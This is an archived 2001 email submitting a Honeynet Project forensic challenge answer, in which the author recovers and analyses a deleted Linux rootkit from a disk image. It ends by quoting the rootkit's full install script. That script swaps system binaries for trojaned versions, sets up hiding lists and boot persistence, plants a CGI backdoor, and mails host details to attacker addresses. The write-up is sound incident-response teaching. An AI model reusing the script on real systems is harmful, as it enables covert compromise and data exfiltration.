From benjamin.morin@francetelecom.com Tue May 22 22:39:13 2001 Date: Tue, 15 May 2001 18:14:32 +0200 From: Benjamin Morin Reply-To: benjamin.morin@rd.francetelecom.fr To: project@honeynet.org Subject: Scan of the month Hi, This is my first attempt to the honeypot challenges. I think these challenges are _really_ good ideas. It took me 5 hours to identify and recover the rootkit, but I guess it might have been done much faster if I had done the right thing at the beginning... ;) I have been interested in security (and especially intrusion detection) for a year now. Here are the steps of my analysis (resumed) : 1) Find signs of the intrusion. ------------------ I first had a look at .* files in dev/ # cd /dev # find . -name ".*" . ./ida/.drag-on ./ida/.. # ls ./ida/.drag-on linsniffer logclear mkxfs s sense sl2 ssh_host_key ssh_random_seed tcp.log # ls "./ida/.. /" linsniffer logclear mkxfs s sense sl2 ssh_host_key ssh_random_seed tcp.log ...herrrmm... ".. /" and ".drag-on" are the same exept the file tcp.log which contains an adress from which a connection occured on local ftp port : cr272065-a.wlfdle1.on.wave.home.com => asdf1 [21] cr272065-a.wlfdle1.on.wave.home.com = 24.43.91.147 ... Anyway, this is not my problem at the moment... linsniffer is a tool to sniff packet networks (http://packetstorm.securify.com/Exploit_Code_Archive/linsniffer.c). logclear kills linsniffer, and restarts it. tcp.log contains the output of linsniffer. sense is a perl linsniffer output parser. sl2 and mkxfs are ELF executable files. # strings sl2 ... "Usage: %s srcaddr dstaddr low high" ... Mmmmh... looks like a DoS. # strings mkxfs ... /etc/sshd_config 1.2.27 sshd version %s [%s] ... It looks like a ssh server. Yes, probably because s is ssh server configuration file, ssh_host_key is a ssh private key ssh_random_seed is another ssh file. Let's see inetd.conf... Looks a bit strange (only pop3...) I start chkrootkit (www.chkrootkit.org): # chkrootkit -r /tmp/honey/root ... Checking `ifconfig'... INFECTED Checking `ps'... INFECTED ... Checking `aliens'... ../root/dev/rpm ../root/dev/last ... All right... By comparing the size of an original RedHat 6.2 box /bin files and the ones we have here, I also see that netstat is different. This is not surprising because /dev/last is a "config file" for this netstat trojaned version that can be found in Linux Root Kit (I think). It contains IP and ports that must be hidden. One of the IP drives me to the lsv.cl.edu.ro domain, but this is not important for this challenge. /dev/rpm is the config file for ps. I hides processes. I have a look at /root/.bash_history The root downloaded emech-2.8.tar.gz... What id emech? Something IRC-related... I don't mind... I have a look at the /etc/rc.d/rc.sysinit file... Mmmm... there is a strange line at the end : /usr/bin/lsattr -t1 -X53 -p Now I have enought info to try to find a known rootkit that contains these files... I make this request on google: "rootkit sl2 linsniffer" And... Wow... How strange! Here is the first answer : http://project.honeynet.org/scans/scan13/som/som13.txt The author is speaking of a rootkit called xzibit.tar.gz. As a matter of fact, the files are nearly the same as the one I found in /dev/ida/.drag-on : a file called sshdu seems to have been replaced by the mkxfs file. I learn many things by reading the auhtor's notes and see that this rootkit is really a copy of xzibit. Something odd : In xzibit rootkit, there are two files, /dev/caca and /dev/dsx which are the same as my /dev/last and /dev/rpm. If I have a look at the strings in /bin/netstat and /bin/ps, I can find /dev/caca and /dev/dsx. Not /dev/last and /dev/rpm... I guess these trojaned versions won't hide anything... :) Anyway... This does not answer to the question :"Show step by step how you identify and recover the deleted rootkit from the / partition" I guess the rootkit is a xzibit-like rootkit, but I didn't recover it. 2) Recover the rootkit -------------- In the other google's other answers, I find a link to http://www.porcupine.org/forensics/tct.html. I get tct and compile it. I don't know how it works... I don't have the time to read the docs. I have only read somewhere that the "ils" tool lists the recently deleted files, and "icat" cats them... # ./ils /tmp/honey/honeynet/honeypot.hda8.dd class|host|device|start_time ils|c-ssr-lab02|../../honeynet/honeypot.hda8.dd|989931723 st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1 23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308 2038|f|1031|100|984707105|984707105|984707105|984707169|40755|0|0|8481|0 2039|f|0|0|1013173693|984707090|984707105|984707105|100755|0|611931|8482|8483 2040|f|0|0|983201398|984707090|984707105|984707105|100644|0|1|9084|0 2041|f|0|0|983588917|984707105|984707105|984707105|100700|0|3713|9085|9086 2042|f|0|0|984707105|984707105|984707105|984707105|100644|0|796|9124|0 ... and so on... I guess the first number must something like an inode, so I try # ./icat /tmp/honey/honeynet/honeypot.hda8.dd 2060 # This is ssh server systemwide configuration file. Port 5 ListenAddress 0.0.0.0 HostKey /dev/ida/.drag-on/ssh_host_key RandomSeed /dev/ida/.drag-on/ssh_random_seed ServerKeyBits 768 LoginGraceTime 600 KeyRegenerationInterval 3600 PermitRootLogin no IgnoreRhosts yes StrictModes yes QuietMode yes X11Forwarding no ... this seems to be one of the files of the rootkit. So I guess the rootkit's archive must be one of the other files. This script recovers all the files which have been deleted : #!/bin/sh for i in `./ils /tmp/honey/honeynet/honeypot.hda8.dd | awk -F \| {'print $1'} do ./icat /tmp/honey/honeynet/honeypot.hda8.dd $i > /tmp/file$i ; done Now I seek a file that is .tar.gz-ed # file /tmp/file* | grep gzip file23: gzip compressed data, deflated, last modified: Sat Mar 3 04:09:06 2001, os: Unix # tar tzvf file23 drwxr-xr-x 1031/users 0 2001-02-26 21:40:30 last/ -rwxr-xr-x 1031/users 611931 2002-02-08 14:08:13 last/ssh -rw-r--r-- 1031/users 1 2001-02-26 16:29:58 last/pidfile -rwx------ 1031/users 3713 2001-03-03 04:08:37 last/install -rwx------ 1031/users 7165 2001-02-26 16:22:50 last/linsniffer -rwxr-xr-x 1031/users 1345 1999-09-09 17:57:11 last/cleaner -rw-r--r-- 1031/users 3278 2001-01-27 16:11:32 last/inetd.conf -rwxr-xr-x 1031/users 79 2001-02-26 16:28:40 last/lsattr -rw-r--r-- 1031/users 11407 2001-01-27 16:11:44 last/services -rwxr-xr-x 1031/users 4060 2001-02-26 16:22:55 last/sense -rw-r--r-- 1031/users 880 2000-10-22 21:29:44 last/ssh_config -rw------- 1031/users 540 2000-10-22 21:29:44 last/ssh_host_key -rw-r--r-- 1031/users 344 2000-10-22 21:29:44 last/ssh_host_key.pub -rw------- 1031/users 512 2000-10-22 21:29:44 last/ssh_random_seed -rw-r--r-- 1031/users 688 2001-02-26 16:29:51 last/sshd_config -rwx------ 1031/users 8268 2001-02-26 16:22:59 last/sl2 -rwxr-xr-x 1031/users 4620 2001-02-26 16:23:10 last/last.cgi -rwxr-xr-x 1031/users 33280 2001-02-26 16:23:33 last/ps -rwxr-xr-x 1031/users 35300 2001-02-26 16:23:42 last/netstat -rwxr-xr-x 1031/users 19840 2001-02-26 16:23:47 last/ifconfig -rwxr-xr-x 1031/users 53588 2001-02-26 16:23:55 last/top -rwx------ 1031/users 75 2001-02-26 16:24:03 last/logclear -rw-r--r-- root/root 708 2001-03-03 04:05:12 last/s -rwxr-xr-x 1031/users 632066 2001-02-26 15:46:04 last/mkxfs Well, I guess that's what I am looking for... (I think the unrm command would have given me the same thing, plus the filenames but I don't know how it works...) I believe this answers the second question ("What files make up the deleted rootkit?"). The install file is at the end of this mail. I just had to read the script to see which files were changed/created with this rootkit. It does exactly what the xzibit did: replaces ifconfig, netstat, ps, top, copies mkxfs in /usr/sbin, creates /dev/rpm and /dev/last, copies files in /dev/ida/.drag-on and "/dev/ida/.. " replaces /etc/inetd.conf and /etc/services, replaces lsattr with a script that is started in /etc/rc.d/rc.sysinit which starts the trojaned ssh server and the sniffer installs a cgi script (last.cgi) on the web server sends infos to last@linuxmail.org and bidi_damm@yahoo.com and deletes itself. The other files from the icat command are the files from the archive and it's execution. Concerning the bonus question and the way it is asked, I am tempted to answer "No, the rootkit was never installed on the system?". But I do not see any other reason to answer this, so I will answer the contrary : Yes, the rootkit was installed on the system because system files (/etc/services, /etc/inetd.conf, /etc/rc.d/rc.sysinit, etc.) have been altered, as I told before. Thart's all I will say at the moment... Just mail me if you think this text needs changes. Best regards, Benjamin Morin & France Telecom R&D benjamin.morin@rd.francetelecom.fr ----------------------------------------------------- install.sh ----------------------------------------------------- #!/bin/sh clear unset HISTFILE echo "********* Instalarea Rootkitului A Pornit La Drum *********" echo "********* Mircea SUGI PULA ********************************" echo "********* Multumiri La Toti Care M-Au Ajutat **************" echo "********* Lemme Give You A Tip : **************************" echo "********* Ignore everything, call your freedom ************" echo "********* Scream & swear as much as you can ***************" echo "********* Cuz anyway nobody will hear you and no one will *" echo "********* Care about you **********************************" echo echo chown root.root * if [ -f /usr/bin/make ]; then echo "Are Make !" else echo "Nu Are Make !" fi if [ -f /usr/bin/gcc ]; then echo "Are Gcc !" else echo "Nu Are Gcc !" fi if [ -f /usr/sbin/sshd/ ]; then echo "Are Ssh !" else echo "Nu Are Ssh !" fi echo -n "* Inlocuim nestat ... alea alea " rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top cp -f mkxfs /usr/sbin/ echo "* Gata..." echo -n "* Dev... " echo echo touch /dev/rpm >/dev/rpm echo "3 sl2" >>/dev/rpm echo "3 sshdu" >>/dev/rpm echo "3 linsniffer" >>/dev/rpm echo "3 smurf" >>/dev/rpm echo "3 slice" >>/dev/rpm echo "3 mech" >>/dev/rpm echo "3 muh" >>/dev/rpm echo "3 bnc" >>/dev/rpm echo "3 psybnc" >> /dev/rpm touch /dev/last >/dev/last echo "1 193.231.139" >>/dev/last echo "1 213.154.137" >>/dev/last echo "1 193.254.34" >>/dev/last echo "3 48744" >>/dev/last echo "3 3666" >>/dev/last echo "3 31221" >>/dev/last echo "3 22546" >>/dev/last echo "4 48744" >>/dev/last echo "4 2222" >>/dev/last echo "* Gata" echo "* Facem Director...Si Mutam Alea.. " mkdir -p /dev/ida/.drag-on mkdir -p /dev/ida/".. " echo "* Copiem ssh si alea" cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/ cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. " rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed touch /dev/ida/.drag-on/tcp.log touch /dev/ida/".. "/tcp.log cp -f inetd.conf /etc cp -f services /etc killall -HUP inetd echo echo echo echo "* Adaugam In Startup:) ..." rm -rf /usr/bin/lsattr echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit cp -f lsattr /usr/bin/ chmod 500 /usr/bin/lsattr chattr +i /usr/bin/lsattr /usr/bin/lsattr sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f last.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f last.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f last.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f last.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f last.cgi /www/cgi-bin/ fi echo "* Luam Informatiile dorite ..." echo "* Info : $(uname -a)" >> computer echo "* Hostname : $(hostname -f)" >> computer echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer echo "* Uptime : $(uptime)" >> computer echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer echo "* Spatiu Liber: $(df -h)" >> computer echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog " cat computer | mail -s "placinte" last@linuxmail.org cat computer | mail -s "roote" bidi_damm@yahoo.com echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ." echo echo echo "* G A T A *" echo echo "* That Was Nice Last " cd / rm -rf last lk.tgz computer lk.tar.gz ------------------------------------------- Benjamin Morin France Telecom R&D / Supelec / INSA benjamin.morin@francetelecom.com